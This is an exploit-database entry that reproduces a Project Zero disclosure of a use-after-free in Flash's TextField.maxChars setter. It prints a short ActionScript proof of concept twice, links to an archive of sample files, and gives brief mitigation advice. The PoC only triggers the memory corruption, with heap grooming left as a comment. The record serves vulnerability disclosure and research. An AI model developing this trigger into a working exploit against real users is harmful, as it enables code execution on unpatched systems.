Vendor: TextField.maxChars Setter
By: Project Zero
CVSS: 7.5 (HIGH)
CWE: 416 (Use-After-Free)
Product Name: TextField.maxChars Setter
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
Year: 2015

Use-After-Free in TextField.maxChars Setter

There is a use-after-free in the TextField.maxChars setter. If the maxChars the field is set to is an object with valueOf defined, the valueOf function can free the field's parent object, which is then used. A minimal PoC is as follows:

var times = 0;
var mc = this.createEmptyMovieClip('mc', 101);
var tf = mc.createTextField('tf', 102, 1, 1, 100, 100);
tf.maxChars = {valueOf : func};

function func(){
    if (times == 0){
        times++;
        return 7;
    }
    mc.removeMovieClip();
    // Fix heap here
    return 7;
}

Mitigation:

Apply the vendor patch (the record notes that one exists). In ActionScript content, assign maxChars only a plain numeric value, never an object that defines valueOf, since the valueOf callback runs while the setter still holds a reference to the field's parent.

Exploit-DB raw data:

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=581

There is a use-after-free in the TextField.maxChars setter. If the maxChars the field is set to is an object with valueOf defined, the valueOf function can free the field's parent object, which is then used. A minimal PoC is as follows:

var times = 0;
var mc = this.createEmptyMovieClip("mc", 101);
var tf = mc.createTextField("tf", 102, 1, 1, 100, 100);
tf.maxChars = {valueOf : func};

function func(){
    if (times == 0){
        times++;
        return 7;
    }
    mc.removeMovieClip();

    // Fix heap here

    return 7;
}

A sample swf and fla are attached.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39650.zip